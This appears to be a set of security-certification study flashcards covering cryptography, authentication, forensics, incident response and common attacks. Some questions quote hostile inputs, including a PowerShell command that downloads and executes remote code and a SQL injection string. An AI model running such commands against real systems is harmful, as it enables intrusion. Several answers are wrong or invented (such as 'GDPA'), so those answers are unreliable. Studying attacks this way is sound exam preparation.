SECP
trojan
A program disguised as a harmless application that actually produces harmful results.
After news of a breach at a competitor, IT at a manufacturer looks to harden server systems. Which system properties should IT disable if they are not in use? (Select all that apply.)
Network interfaces System services Service ports
Organization Unit
OU. Directory container to apply different security policy to a subnet of objects within same domain.
DH
(Diffie-Hellman) A cryptographic protocol that provides for secure key exchange. short time no server key
Which of the following ISO standards is certified for privacy?
27701
Analyze and compare the access control models in terms of how Access Control Lists (ACL) are written and determine which statement accurately explains the Discretionary Access Control (DAC) model
A DAC model is the most flexible and weakest access control model. The owner has full control over the resource and grants rights to others. Solution
Kriten wants to generate a unique digital fingerprint for a file, and needs to choose between a checksum and a hash. Which option should she choose and why should she choose it?
A hash, because it is unique to the file
choose between a checksum and a hash. Which option should she choose and why should she choose it?
A hash, because it is unique to the file
SSH 2 types of key pairs
A hsf keypair IDs SSH server. User keypair, client logins into SSH server
Question Compare the characteristics of service account types and determine which statement accurately describes the characteristics of a local service account.
A local service account has the same privileges as the standard user account and can only access network resources as an anonymous user.
DNS poisoning
An attack that substitutes DNS addresses so that the computer is automatically redirected to an attacker's device.(change in ip address for a vendor)
Asymmetric Cryptography
AKA public key cryptography. Slower than symmetric key cryptography. Developed to overcome weaknesses in symmetric cryptography. Uses a public and a private key.
An IT manager in the aviation sector checks the industry's threat intelligence feed to keep up on the latest threats and ensure the work center implements the best practices in the field. What type of threat intelligence source is the IT manager most likely accessing?
An Information Sharing and Analysis Center (ISAC)
Edward is responsible for web application security at a large insurance company. One of the applications that he is particularly concerned about is used by insurance adjusters in the field. He wants to have strong authentication methods to mitigate misuse of the application. What would be his best choice?
Auth with digital cert
A security information and event management (SIEM) manager analyzes logs from a network RADIUS server. When the SIEM manager analyzes this data, what is the manager looking for as an indicator of possible malicious activity?
Authentication attempt errors Solution
Question The Human Resources department works with the IT department at an organization to develop employee security training. Which security control type and function describes the training program? (Select all that apply.)
Deterrent operational
Analyze the features of behavioral technologies for authentication, and choose the statements that accurately depict this type of biometric authentication. (Select all that apply.)
Behavioral technologies are cheap to implement, but have a higher error rate than other technologies. Behavior technologies may use typing as a template, which matches the speed and pattern of a user's input of a passphrase.
Elias wants to secure a real-time operating system (RTOS). What technique is best suited to providing RTOS security?
Use secure firmware.
An employee is working on a team to build a directory of systems they are installing in a classroom. The team is using the Lightweight Directory Access Protocol (LDAP) to update the X.500 directory. Utilizing the standards of an X.500 directory, which of the following distinguished names is the employee most likely to recommend?
CN=system1,CN=user,OU=Univ,DC=local
What type of attack exploits the trust that a website has for an authenticated user to attack that website by spoofing requests from the trusted user?
CRSF
A security analyst is reviewing a penetration-testing report from a third-party contractor. The penetration testers used the organization's new API to bypass a driver to perform privilege escalation on the organization's web servers. Upon looking at the API, the security analyst realizes the particular API call was to a legacy system running an outdated OS. Which of the following is the MOST likely attack type?
CSRF
A security analyst is looking for a solution to help communicate to the leadership team the severity levels of the organization's vulnerabilities. Which of the following would BEST meet this need?
CVSS
Pharming attack
Customer enters ip adress 172.xxx and browser goes to 168.xx which is a fake site
IAM
Identity and access management.
A systems administrator deploys a cloud access security broker (CASB) solution for user access to cloud services. Evaluate the options and determine which solution may be configured at the network edge and without modifying a user's system.
Reverse proxy
nmap -O
Scan app to identify which ports are open and the running OS, shows what can be seen from outside.
What additional security control can Kristen implement if she uses compiled software that she cannot use if she only has software binaries? Correct Answer:
She can review the source code.
SOP
Standard Operating Procedure
Kristen is a software development team manager. She is concerned about memory leaks in code. What type of testing is most likely to find memory leaks?
Static code analysis
arp command. What useful information will this command provide?
The MAC address of systems the host has communicated with.
Which of the following defines key usage with regard to standard extensions?
The purpose for which a certificate was issued
An engineer configures a proxy to control access to online content for all users in an organization. Which proxy type does the engineer implement by using an inline network appliance? (Select all that apply.)
Transparent Intercepting
To mitigate any possible risk of a virus infection, the plan includes which physical and administrative controls? (Select all that apply.)
User training USB port locks
Adam wants to use a tool to edit the contents of a drive. Which of the following tools is best suited to that purpose?
WinHex
tool that is specifically designed to send unexpected data to a web application that he is testing. The application is running in a test environment, and configured to log events and changes. What type of tool is Ben using?
a fuzzer
When exploring the deep web, a user will need which of the following to find a specific and hidden dark web site?
a specific url or ip
AES
advanced encryption standard, a symmetric 128-bit block data encryption technique
Differential backup
all new and modified files since the last full backup are part of the backup set. With a differential backup type, the archive bit on a file is set to not cleared.
What browser feature is used to help prevent successful URL redirection attacks?
displaying the full real URL
A company recently moved sensitive videos between on-premises, company-owned websites. The company then learned the videos had been uploaded and shared to the Internet. Which of the following would MOST likely allow the company to find the cause?
log analysis
A security analyst needs to complete an assessment. The analyst is logged into a server and must use native tools to map services running on it to the server's listening ports. Which of the following tools can BEST accomplish this task?
netstat
An analyst needs to identify the applications a user was running and the files that were open before the user''s computer was shut off by holding down the power button. Which of the following would MOST likely contain that information?
pagefile
After a ransomware attack, a forensics company needs to review a cryptocurrency transaction between the victim and the attacker. Which of the following will the company MOST likely review to trace this transaction?
the public ledger
Why are memory leaks a potential security issue?
they can cause crashes
A gaming company decides to add software on each title it releases. The company's objective is to require the CD to be inserted during use. This software will gain administrative rights, change system files, and hide from detection without the knowledge or consent of the user. Consider the malware characteristics and determine which is being used. (Select all that apply)
trojan rootkit
An enterprise has hired an outside security firm to conduct penetration testing on its network and applications. The firm has been given all the developerג€™s documentation about the internal architecture. Which of the following BEST represents the type of testing that will occur?
white box
When this occurs, the network experiences broadcast storms, causing network outages. What network configuration setting should he enable on his switches to prevent this?
Loop protection
Stream Cipher
An encryption method that encrypts data as a stream of bits or bytes. Compare with block cipher.
After a company moves on-premise systems to the cloud, engineers devise to use a serverless approach in a future deployment. What type of architecture will engineers provision in this deployment? (Select all that apply.)
Containers Microservices
Which of the following incident response steps involves actions to protect critical systems while maintaining business operations?
Containment
CTM
Counter mode. A mode of operation used for block ciphers . Allows ciphers to behave like stream ciphers.
A company performing a risk assessment calculates how much potential cost the company has saved by implementing a security measure. Which formula will they use to calculate this metric?
[(ALE-ALEm)-Cost of Solution]/Cost of Solution
Block Cipher
A cipher that manipulates an entire block of plaintext at one time. Padded to correct size if there is not enough data in plaintext.
host-based firewall
A firewall that only protects the computer on which it's installed.
Steganography
A technology that makes it possible to embed hidden information in documents, pictures, and music file. Uses a cryptographic technology to convert message channel in tcp packet data fields.
Which statement best illustrates the importance of a strong true random number generator (TRNG) or pseudo-random number generator (PRNG) in a cryptographic implementation?
A weak number generator leads to many published keys sharing a common factor.
Henry wants to deploy a web service to his cloud environment for his customers to use. He wants to be able to see what is happening and stop abuse without shutting down the service if customers cause issues. What two things should he implement to allow this?
API keys and logging via an API gateway
An organization just experienced a major cyberattack incident. The attack was well coordinated, sophisticated, and highly skilled. Which of the following targeted the organization?
APT
Analyze the types of password cracker attacks to determine which scenario best describes a brute force attack.
An attacker attempts every possible combination in the key space in order to derive a plaintext password from a hash
Compare and evaluate the main components in an Extensible Authentication Protocol (EAP). Which scenarios accurately differentiate between these components? (Select all that apply.)
An authenticator establishes a channel for the supplicant and the authentication server to exchange credentials using EAP. A supplicant requests authentication and the authentication server performs the authentication.
IT department at an organization to develop employee security training. Which security control type and function describes the training program? (Select all that apply.)
An operational control is implemented primarily by people rather than systems. For example, policies and training programs are operational controls. A deterrent psychologically discourages an attacker from attempting an intrusion.
What phase follows lateral movement in the Cyber Kill Chain?
Anti-forensics
Systems administrators configure an application suite that uses a collection of single hash functions and symmetric ciphers to protect sensitive communication. While the suite uses these security features collectively, how is each instance recognized?
As a cryptographic primitive
Which statement best illustrates the advantages and disadvantages of using asymmetric encryption?
Asymmetric encryption is ideal for proving identity, but it requires significant computing overhead and is inefficient for bulk encryption. Solution Another user cannot impersonate a private key holder, so asymmetric encryption proves identity
Analyze the following scenarios and determine which cases call for account disablement over account lockout. (Select all that apply.)
Audit logs reveal suspicious activity on a privileged user's account. A user's company laptop and key fob are stolen at an airport.
Kristen wants to help her organization use APIs more securely and needs to select three API security best practices. Which of the following options is not a common API security best practice?
Authorize before authenticating.
Encrypted message embedded in image(2)
Confidentiality and security by obscurity
What does setting the secure attribute for an HTTP cookie result in?
Cookies will be sent only over HTTPS.
A security engineer is reviewing log files after a third party discovered usernames and passwords for the organization's accounts. The engineer sees there was a change in the IP address for a vendor website one week earlier. This change lasted eight hours. Which of the following attacks was MOST likely used?
DNS poisoning
An incident, which is affecting dozens of systems, involves malware that reaches out to an Internet service for rules and updates. The IP addresses for the Internet host appear to be different in each case. The organization would like to determine a common IoC to support response and recovery actions. Which of the following sources of information would BEST support this solution?
DNS query logs
DES, 3DES
Data Encryption Standard - DES and Triple DES Weak encryption deployed on servers •One of the Federal Information Processing Standards (FIPS) •64-bit block cipher •56-bit key (very small in modern terms) •3DES - Use the DES algorithm three times •Three keys, two keys, or the same key three times •Superseded by AES (Advanced Encryption Standard)
Which of the following provides the BEST protection for sensitive information and data stored in cloud-based services but still allows for full functionality and searchability of data within the cloud-based services?
Data encryption
Kristen, a user at a company, clicked an email link that led to a website that infected her workstation. Kristen was connected to the network, and the virus spread to the network shares. The protective measures failed to stop this virus, and it has continued to evade detection. Which of the following should a security administrator implement to protect the environment from this malware?
Implement a heuristic behavior-detection solution.
Question An Identity and Access Management (IAM) system has four main processes. Which of the following is NOT one of the main processes?
Integrity
LEAP
Lightweight Extensible Authentication Protocol(does not support TLS)
Analyze the following security information and event management (SIEM) functions and determine which event is NOT conducted during data aggregation.
Link observables into a meaningful indicator of risk, or Indicator of Compromise (IOC).
Choose two techniques that are most commonly associated with a pharming attack. 1
Modifying the host's file on a PC or exploiting a DNS vulnerability on a trusted DNS server
Which features distinguish a next-generation endpoint detection and response (EDR) product from traditional EDR solutions? (Select all that apply.)
Next-generation endpoint agents use cloud management, rather than reporting to an on-premises server. Next-generation endpoint detection systems use artificial intelligence (AI) and machine learning to perform user and entity behavior analysis (UEBA).
Which two cryptographic functions can be combined to authenticate a sender and prove the integrity of a message?
Public key cryptography and hashing
Michael's organization uses self-signed certificates throughout its internal infrastructure. After a compromise, Michael needs to revoke one of the self-signed certificates. How can she do that?
Remove the certificate from the list of whitelisted certificates from each machine that trusts it.
Which of the following is the best description of a stored procedure?
SQL statements compiled on the database server as a single procedure that can be called
A security information and event management (SIEM) handler's dashboard provides graphical representations of user profile trends. The graphic contrasts standard user activity with administrative user activity and flags activity that deviates from these clusters. This graphical representation utilizes which trend analysis methodology?
Statistical deviation analysis
Select the explanations that accurately describe the Ticket Granting Ticket (TGT) role within the Authentication Service (AS). (Select all that apply.)
The client sends the AS a request for a TGT that is composed by encrypting the date and time on the local computer with the user's password hash as the key. The AS responds with a User Ticket that contains information about the client. This includes the name and IP address of the client, plus a timestamp and validity period.
Two companies enter into an agreement that if one data center suffers a disaster-level event, it can failover to the other company's data center with minimal disruption in service. Which statement most accurately describes the companies' site resiliency postures?
The companies have a reciprocal arrangement for mutual hot site support.
A small company needs to secure the perimeter of their network, but they do not have the overhead or infrastructure to construct a demilitarized zone. Examine the following recommendations and select the best solution for this small company.
The company should configure a screened host.
Analyze the factors associated with performing a Business Process Analysis (BPA) and select the statement that aligns with the output factors.
The data or resources a function produces
An outside security consultant updates a company's network, including data cloud storage solutions. The consultant leaves the manufacturer's default settings when installing network switches, assuming the vendor shipped the switches in a default-secure configuration. Examine the company's network security posture and select the statements that describe key vulnerabilities in this network. (Select all that apply.)
The default settings in the network switches represent a weak configuration. The network is open to third-party risks from using an outside contractor to configure cloud storage settings.
how a hierarchical certificate authority (CA) trust model mitigates the weakness in a single CA model and guards against the compromise of the root CA?
The hierarchical CA model still uses a single root CA, but delegates certificate granting authority to intermediate CAs, so the root CA may go offline in a secure configuration.
Degaussing
The process of removing or rearranging the magnetic field of a disk in order to render the data unrecoverable
A security auditor is reviewing vulnerability scan data provided by an internal security team. Which of the following BEST indicates that valid credentials were used?
The scan enumerated software versions of installed programs
An investigator needs to analyze all data on a system. Which file does the investigator review if it contains data while in use when physical RAM in a system is exceeded?
The swap file/swap partition stores pages of memory in use that exceed the capacity of the host's RAM modules. The pagefile is not structured in a way that analysis tools can interpret, but it is possible to search for strings.
An attack at a company renders a network useless after a switch is impacted. Engineers review network traffic and determine that the switch is behaving like a hub. What do the engineers conclude is happening? (Select all that apply.)
The switch's memory is exhausted. The switch is flooding unicast traffic.
A banking firm's IT team discovers a possible man-in-the-middle attack. Which of the following statements describes an assessment tool, built into the operating system, that would result in this discovery? (Select all that apply.)
This tool sends probes to report the round trip time (RTT) for hops between the local host and a host on a remote network. This tool displays the local machine's Address Resolution Protocol (ARP) cache.
A website developer is working on a new e-commerce website and has asked an information security expert for the most appropriate way to store credit card numbers to create an easy reordering process. Which of the following methods would BEST accomplish this goal?
Tokenizing the credit cards in the database
What are the most common, baseline account policies system administrators implement on a secure domain network? (Select all that apply.)
Use upper- and lower-case letters, numbers, and special characters for passwords. Set a lockout duration period of one hour.
tcpdump
Verify client-server is sending encrypted traffic. Administrators use it to capture packets.
Pharming
a means of redirecting users from a legitimate website to a malicious one that relies on corrupting the way the victim's computer performs IP address resolution. This is illustrated in the bank customer scenario.
Barbara wants to implement WPA3 Personal. Which of the following features is a major security improvement in WPA3 over WPA2?
brute force prevention
An enterprise has hired an outside security firm to facilitate penetration testing on its network and applications. The firm has agreed to pay for each vulnerability that is discovered. Which of the following BEST represents the type of testing that is being used?
bug bounty
What term is used to describe the documentation trail for control, analysis, transfer, and final disposition of evidence for digital forensic work?
chain of custody
A system administrator has just entered their credentials to enter a secure server room. As the administrator is entering the door, someone is walking up to the door with their hands full of equipment and appears to be struggling to move items around while searching for their credentials. The system administrator quickly begins to assist by getting items out of the person's hands, and they walk into the room together. This person is not an employee, but someone attempting to gain unauthorized access to the server room. What type of social engineering has occurred?
consensus/social proof
Which tool can give him both DNS query information and Google search information about hosts and domains through a single tool?
dnsenum
A system that Sam is responsible for crashed, and Sam suspects malware may have caused an issue that led to the crash. Which of the following files is most likely to contain information if the malware was a file-less, memory-resident malware package?
dumpfile
An organization routes all of its traffic through a VPN. Most users are remote and connect into a corporate datacenter that houses confidential information. There is a firewall at the Internet border, followed by a DLP appliance, the VPN server, and the datacenter itself. Which of the following is the WEAKEST design element?"
encrypted VPN traffic will not be inspected when entering or leaving the network
A security analyst is running a vulnerability scan to check for missing patches during a suspected security incident. During which of the following phases of the response process is this activity MOST likely occurring?
identification
A security administrator suspects there may be unnecessary services running on a server. Which of the following tools will the administrator MOST likely use to confirm these suspicions?
nmap
A system administrator must scan the company's web-based application to identify which ports are open and which operating system can be seen from the outside world. Determine the syntax that should be used to yield the desired information if the administrator will be executing this task from a Linux command line.
nmap -O webapp.company.com
A network manager needs a map of the network's topology. The network manager is using Network Mapper (Nmap) and will obtain the visual map with the Zenmap tool. If the target IP address is 192.168.1.1, determine the command within Nmap that will return the necessary data to build the visual map of the network topology.
nmap -sn --traceroute 192.168.1.1
An organization is concerned that its hosted web servers are not running the most updated version of the software. Which of the following would work BEST to help identify potential vulnerabilities?
nmap comptia.org -p 80 -sV
You are responsible for incident response at Acme Corporation. You have discovered that someone has been able to circumvent the Windows authentication process for a specific network application. It appears that the attacker took the stored hash of the password and sent it directly to the backend authentication service, bypassing the application. What type of attack is this?
pass the hash
Jim is preparing a presentation about his organization's incident response process and wants to explain why communications with involved groups and individuals across the organization are important. Which of the following is the primary reason that organizations communicate with and involve staff from affected areas throughout the organization in incident response efforts?
stakeholder management
You are responsible for database security at your company. You are concerned that programmers might pass badly written SQL commands to the database, or that an attacker might exploit badly written SQL in applications. What is the best way to mitigate this threat?
stored procedures
A privileged user at a company stole several proprietary documents from a server. The user also went into the log files and deleted all records of the incident. The systems administrator has just informed investigators that other log files are available for review. Which of the following did the administrator MOST likely configure that will assist the investigators?
syslog server
A security analyst wants to verify that a client-server (non-web) application is sending encrypted traffic. Which of the following should the analyst use?
tcpdump
A contractor has been hired to conduct penetration testing on a company's network. They have decided to try to crack the passwords on a percentage of systems within the company. They plan to annotate the type of data that is on the systems that they can successfully crack to prove the ease of access to data. Evaluate the penetration steps and determine which are being utilized for this task. (Select all that apply.)
test security controls Exploit vulnerabilities
The website http://companywebsite.com requires users to provide personal information, including security question responses, for registration. Which of the following would MOST likely cause a data breach?
unsecure protocol
A company is required to continue using legacy software to support a critical service. Which of the following BEST explains a risk of this practice? [I don't love this question, but let's try it anyway]
unsecure protocols
difference between a Type I and a Type II hypervisor.
A Type II hypervisor installs on a host OS, that manages virtual machines. A Type I (or "bare metal") hypervisor interfaces directly with the host hardware.
White box
A test where the tester has an in-depth knowledge of the network and systems being tested, including network diagrams, IP addresses, and even the source code of custom applications.
MSSP
Managed Security Service Provider
The SOC is reviewing processes and procedures after a recent incident. The review indicates it took more than 30 minutes to determine that quarantining an infected host was the best course of action. This allowed the malware to spread to additional hosts before it was contained. Which of the following would be BEST to improve the incident response process?
Updating the playbooks with better decision points
A company follows a bring your own device (BYOD) mobile implementation. What is an ideal solution the company can use to overcome some of the security risks involved with employee-supplied devices?
Virtual desktop infrastructure (VDI)
A global pandemic is forcing a private organization to close some business units and reduce staffing at others. Which of the following would be BEST to help the organization's executives determine their next course of action?
a business continuity plan
order of volatility, which of the following items should be forensically captured after the hard drive?
backups
Kristen, a forensic analyst, needs to prove that the data she originally acquired has remained unchanged while in her custody. Which of the following should she use?
checksums
Gary has enabled automatic updates for the Windows systems that are used in the small business he works for. What hardening process will still need to be tackled for those systems if he wants a complete patch management system?
third party software and firmware patching
An organization has hired a security analyst to perform a penetration test. The analyst captures 1Gb worth of inbound network traffic to the server and transfers the pcap back to the machine for analysis. Which of the following tools should the analyst use to further review the pcap?
wireshark
Which of the following sequences properly orders forensic data acquisition by volatility priority?
1. System memory caches 2. Data on mass storage devices 3. Remote monitoring data 4. Archival media
A company recently set up an e-commerce portal to sell its product online. The company wants to start accepting credit cards for payment, which requires compliance with a security standard. Which of the following standards must the company comply with before accepting credit cards on its e-commerce platform?
PCI DSS
A system administrator is setting up a new Simple Mail Transfer Protocol (SMTP) configuration. Make recommendations for how the administrator should configure the ports. (Select all that apply.)
Port 25 should be used for message relay. Port 465 should be used for message submission over implicit TLS.
Dynamic ARP Inspection (DAI)
Port security feature that mitigates ARP poisoning. Relies upon DHCP snooping being enabled.
Evaluate the following controls that have been set by a system administrator for an online retailer. Determine which statement demonstrates the identification control within the Identity and Access Management (IAM) system.
A control is set to ensure that billing and primary delivery addresses are valid.
Analyze the following attacks to determine which best illustrates a pharming attack.
A customer enters the correct URL address of their bank, which should point to the IP address 172.1.24.4. However, the browser goes to 168.254.1.1, which is a fake site designed to look exactly like the real bank site.
PCAP - Packet Capture
A file that contains packets captured from a protocol analyzer or sniffer.
Which of the following statements summarizes a disadvantage to performing an active vulnerability scan? (Select all that apply.)
Active scanning runs the risk of causing an outage. Active scanning consumes more network bandwidth
Which of the following is the correct order of volatility from MOST to LEAST volatile?
Cache, memory, temporary filesystems, disk, archival media
A security analyst is reviewing output of a web server log and notices a particular account is attempting to transfer large amounts of money: GET http://bank.com/transfer.do?acctnum=09873456&amount=50000 HTTP/1.1 GET http://bank.com/transfer.do?acctnum=09873456&amount=500000 HTTP/1.1 GET http://bank.com/transfer.do?acctnum=09873456&amount=100000 HTTP/1.1 GET http://bank.com/transfer.do?acctnum=09873456&amount=50000 HTTP/1.1 Which of the following types of attack is MOST likely being conducted?
CSRF
CA
Certificate Authority. An organization that manages, issues, and signs certificates and is part of a PKI. Certificates are an important part of asymmetric encryption. Certificates include public keys along with details on the owner of the certificate and on the CA that issued the certificate. Certificate owners share their public key by sharing a copy of their certificate.
East-west traffic
Data center or server farm, single external request causes multiple cascading request between servers and data center. Creates bottleneck build of traffic.
"Analyze and determine the role responsible for managing the system where data assets are stored, and is responsible for enforcing access control, encryption, and backup measures."
Data custodian
A hacker remotely gains unauthorized access to a company's system and makes a copy of proprietary business data. Which of the following summarizes the event that has taken place?
Data exfiltration
Following a data breach at a large retail company, their public relations team issues a statement emphasizing the company's commitment to consumer privacy. Identify the true statements concerning this event. (Select all that apply.)
Data exfiltration by a malicious actor may have caused the data breach. The privacy breach may allow the threat actor to sell the data to other malicious actors.
Kristen wants to use the security features built into HTTP headers. Which of the following is not an HTTP header security option?
Disabling SQL injection
Claire discovers the following PowerShell script. What does it do? powershell.exe -ep Bypass -nop -noexit -c iex ((New ObjectNet.WebClient). DownloadString('https://example.com/file.psl))
Downloads a file into memory
Which statement regarding attacks on media access control (MAC) addresses accurately pairs the method of protection and what type of attack it guards against? (Select all that apply.)
Dynamic Host Configuration Protocol (DHCP) snooping guards against MAC spoofing. Dynamic address resolution protocol inspection (DAI) guards against MAC flooding.
Symmetric cryptographic ciphers
Encryption used for confidentiality and uses the sam key for encryption and decryption.
A contractor has been hired to conduct penetration testing on a company's network. They have decided to try to crack the passwords on a percentage of systems within the company. They plan to annotate the type of data that is on the systems that they can successfully crack to prove the ease of access to data. Evaluate the penetration steps and determine which are being utilized for this task. (Select all that apply.)
Exploit vulnerabilities Test Security Controls
Many Internet companies, such as Google and Facebook, allow users to share a single set of credentials between multiple services providers. For example, a user could login to Amazon using their Facebook credentials. Which term correctly defines this example?
Federation
What is the main use of hashing in databases?
For indexing and retrieval
A security professional is looking to harden systems at an industrial facility. In particular, the security specialist needs to secure an HVAC system that is part of an IoT network. Which areas does the specialist look to secure from data exfiltration exploits? (Select all that apply.)
Fog node Edge gateway
A Chief Information Security Officer (CISO) needs to create a policy set that meets international standards for data privacy and sharing. Which of the following should the CISO read and understand before writing the policies?
GDPA
Which of the following is MOST likely to outline the roles and responsibilities of data controllers and data processors?
GDPR
GDPA
General Data Protection Act. International standards for privacy and sharing.
GDPR
General Data Protection Regulation: Outlines roles and responsibilities of data controllers and data processors.
A cooperative group of farmers and ranchers consider network options for embedded systems that operate automated irrigation and feeding processes. The cooperative is most likely to be concerned with which embedded network features? (Select all that apply.)
High reliability Low latency
A pharmaceutical sales representative logs on to a laptop and connects to the public WiFi to check emails and update reports. Which of the following would be BEST to prevent other devices on the network from directly accessing the laptop? (Choose two.)
Host-base firewall TPM
A server operates an intrusion detection system (IDS) that enables a system administrator to verify that key system files match authorized versions. This illustrates what IDS implementation and feature?
Host-based intrusion detection system (HIDS) with file integrity monitoring (FIM)
Compare the components found in a virtual platform and select the options that accurately differentiate between them. (Select all that apply.)
Hypervisors are Virtual Machine Monitors (VMM) and guest operating systems are Virtual Machines (VM). Hypervisors facilitate interactions with the computer hardware and computers are the platform that hosts the virtual environment.
A network administrator has been asked to install an IDS to improve the security posture of an organization. Which of the following control types is an IDS?
IDS
When a network uses Extensible Authentication Protocol (EAP) as the authentication method, what access control protocol provides the means for a client to connect from a Virtual Private Network (VPN) gateway?
IEEE802.1X
Charlene wants to set up a tool that can allow her to see all the systems a given IP address connects to and how much data is sent to that IP by port and protocol. Which of the following tools is not suited to meet that need?
IPSec
Daniel works for a mid-sized financial institution. The company has recently moved some of its data to a cloud solution. Daniel is concerned that the cloud provider may not support the same security policies as the company's internal network. What is the best way to mitigate this concern?
Implement a cloud access security broker.
A security team uses passive scanning to gather information and data related to a suspected rogue system on a network. By using passive scanning, what type of information does the team gather?
Indirect evidence
Security solutions providers and academics conduct primary research to produce outputs on threat intelligence that takes three main forms. Which of these selections is NOT one of the three main outputs?
Information Sharing and Analysis Centers (ISACs)
PCI DSS
Information security standard for organizations that process credit or bank card payments.
A user presents a smart card to gain access to a building. Authentication is handled through integration to a Windows server that's acting as a certificate authority on the network. Review the security processes and conclude which are valid when using Kerberos authentication. (Select all that apply.)
Inputting a correct PIN authorizes the smart card's cryptoprocessor to use its private key to create a Ticket Granting Ticket (TGT) request. The Authentication Server (AS) trusts the user's certificate as it was issued by a local certification authority.
What is NOT a benefit of a serverless architecture?
It is ideal for complex applications.
Which of the following statements most accurately describes the function of key stretching?
Key stretching adds entropy to a user-generated password.
Kristen is concerned about LDAP injection attacks against her directory server. Which of the following is not a common technique to prevent LDAP injection attacks?
LDAP query parameterization
dvantage of a layer 7 load balancer over a layer 4 load balancer.
Layer 4 can only check connectivity and layer 7 can test an application's state.
an incident response team that will be responsible for handling certain aspects of recovery and remediation following a security incident. What internal offices should provide a representative to serve as a member of this team? (Select all that apply.)
Legal HR PR
netstat
Logged into server, native tool to map running services on a server and list ports.
A small company that does not have security staff but wants to improve its security posture. Which of the following would BEST assist the company?
MSSP
When you are concerned about application security, what is the most important issue in memory management?
Make sure you release any memory you allocate.
You are a security administrator for Acme Corporation. You have discovered malware on some of your company's machines. This malware seems to intercept calls from the web browser to libraries, and then manipulates the browser calls. What type of attack is this?
MitB
Discussed who they are and their company. Then went into depth on CIS roles within the organization and the imortance. Finished with open discussion with the room where they were able to answer some of the questions regarding certain roles and responsibilities they have.
PUT
When using a digital envelope to exchange key information, the use of what key agreement mitigates the risk inherent in the Rivest-Shamir-Adleman (RSA) algorithm, and by what means?
Perfect forward secrecy (PFS) uses Diffie-Hellman (DH) key agreement to create ephemeral session keys without using the server's private key.
PFS
Perfect Forward Secrecy. New keys within DH are not based on seeds from previous keys when PFS is enabled, further increasing security. PFS is associated only with IKE Phase 2. Short session keys no server private key
A hacker set up a Command and Control network to control a compromised host. What is the ability of the hacker to use this remote connection method as needed known as?
Persistence
After a phishing scam for a user's credentials, the red team was able to craft a payload to deploy on a server. The attack allowed the installation of malicious software that initiates a new remote session. Which of the following types of attacks has occurred?
Privilege escalation
An employee calls IT personnel and states that they received an email with a PDF document to review. After the PDF was opened, the system has not been performing correctly. An IT admin conducted a scan and found a virus. Determine the two classes of viruses the computer most likely has. (Select all that apply.)
Program Script
2 cryptographic functions that can be combined to auth a user and prove integrity.
Public key cryptography and hashing
Both Remote Access Dial-In User Service (RADIUS) and Terminal Access Controller Access-Control System (TACACS+) provide authentication, authorization, and accounting using a separate server (the AAA server). Based on the protocols' authentication processes, select the true statements. (Select all that apply.)
RADIUS uses UDP and TACACS+ uses TCP. TACACS+ encrypts the whole packet (except the header) and RADIUS only encrypts the password . RADIUS is primarily used for network access and TACACS+ is primarily used for device administration.
RSA
Rivest-Shamir-Adleman (RSA): key agreement to create short session keys without servers private key. uses PFS and DH.
Consider the role trust plays in federated identity management and determine which models rely on networks to establish trust relationships. (Select all that apply.)
SAML OAuth OpenID
You are responsible for incident response at Acme Bank. The Acme Bank website has been attacked. The attacker used the login screen, but rather than enter login credentials, they entered some odd text: ' or '1' = '1. What is the best description for this attack?
SQLi
A user's PC is infected with a virus that appears to be memory resident and loads anytime it is booted from an external universal serial bus (USB) thumb drive. Examine the following options and determine which describes the infection type
Script virus
An engineering firm provisions microwave technology for a wide area communications project. When using point-to-multipoint (P2M) mode, which technologies does the firm put in place? (Select all that apply.)
Sectoral antennas Multiple sites connected to a single hub
What type of attack replays a cookie?
Session hijacking
The installation technician tests the device's sensitivity to speed and pressure. Which type of behavioral technology is the technician testing for?
Signature recognition Signature matching records the user applying their signature (stroke, speed, and pressure of the stylus).
An employee has arrived to work and logged into the network with their smart card. This employee now has access to the company databases, email, and shared network resources. Evaluate all of the basic authorization policies and determine the policy best illustrated in this scenario.
Single Sign-On (SSO)
A systems engineer looks to monitor a network for security purposes. The engineer places sensors throughout the building in appropriate places, but does not have enough to cover all areas that they want to monitor. Fortunately, the engineer thought ahead and purchased appropriate network switches. Which sensor type does the engineer use? (Select all that apply.)
Switched port analyzer (SPAN) is a sensor that is attached to a specially configured port on the switch that receives copies of frames. A mirrored port is the same as a SPAN port. This method is not completely reliable. Frames with errors will not be mirrored and frames may be dropped under heavy load.
secure mail being retrieved via the Post Office Protocol Version 3 (POP3) because she knows that it is unencrypted by default. What is her best option to do this while leaving POP3 running on its default port?
TLS via port 110
differentiates between file transfer protocol (FTP), secure shell file transfer protocol (SFTP), and file transfer protocol over secure socket layer (FTPS)?
TP has no encryption. FTPS adds transport layer security (TLS), and SFTP is an entirely different protocol based on the network protocol SSH (secure shell). SFTP uses only one connection and encrypts both authentication information and data files being transferred.
A security manager conducting forensic analysis looks for evidence of misconduct on the employee's workstation and in system logs. Examine the scenario and determine what argument a defense attorney might bring up concerning the forensic investigative process. (Select all that apply.)
The examiner conducted analysis with bias. The examination did not follow ethical procedures.
Question An employee suspected of storing illicit content on a company computer discovers a plan to investigate, so the employee tries to hide evidence of wrongdoing. The employee deletes the illicit files and attempts to overwrite them. If a forensics investigation can discover the lost files, which statement best describes how?
The forensics investigator can retrieve fragments of deleted or overwritten files.
Applying information from the Computer Security Incident Handling Guide, determine the next step the system administrator should take to mitigate the effects of the incident and restore the network to optimal functionality.
The system administrator should determine how the unauthorized software was installed and identify what security to modify to prevent future incidents, then fully document the incident.
An auditor is performing an assessment of a security appliance with an embedded OS that was vulnerable during the last two assessments. Which of the following BEST explains the appliance's vulnerable state?
The vendor has not supplied a patch for the appliance.
Question A company's IT department pushes system updates and configures user permissions from the same shared account. Which statement best describes how this practice is problematic?
This practice breaks non-repudiation.
An IT director reads about a new form of malware that targets a system widely utilized in the company's network. The director wants to discover whether the network has been targeted, but also wants to conduct the scan without disrupting company operations or tipping off potential attackers to the investigation. Evaluate vulnerability scanning techniques and determine the best tool for the investigation.
Threat hunting
When they resolve the breach, they want to publish the cyber threat intelligence (CTI) securely, using standardized language for other government agencies to use. The team will transmit threat data feed via which protocol?
Trusted Automated eXchange of Indicator Information (TAXII)
TPM
Trusted Platform Module. Hardware based provides cryptographic operations.
What is the root cause of improper input handling?
Trusting rather than validating data inputs
https://www.example.com/login.html?Relay=http%3A%2F%2Fexample.com%2Fsite.html What type of vulnerability is this code most likely to be susceptible to?
URL redirect
Tony is reviewing a web application and discovers the website generates links like the following: https://www.example.com/login.html?Relay=http%3A%2F%2Fexample.com%2Fsite.html What type of vulnerability is this code most likely to be susceptible to?
URL redirection
In which of these situations might a non-credentialed vulnerability scan be more advantageous than a credentialed scan? (Select all that apply.)
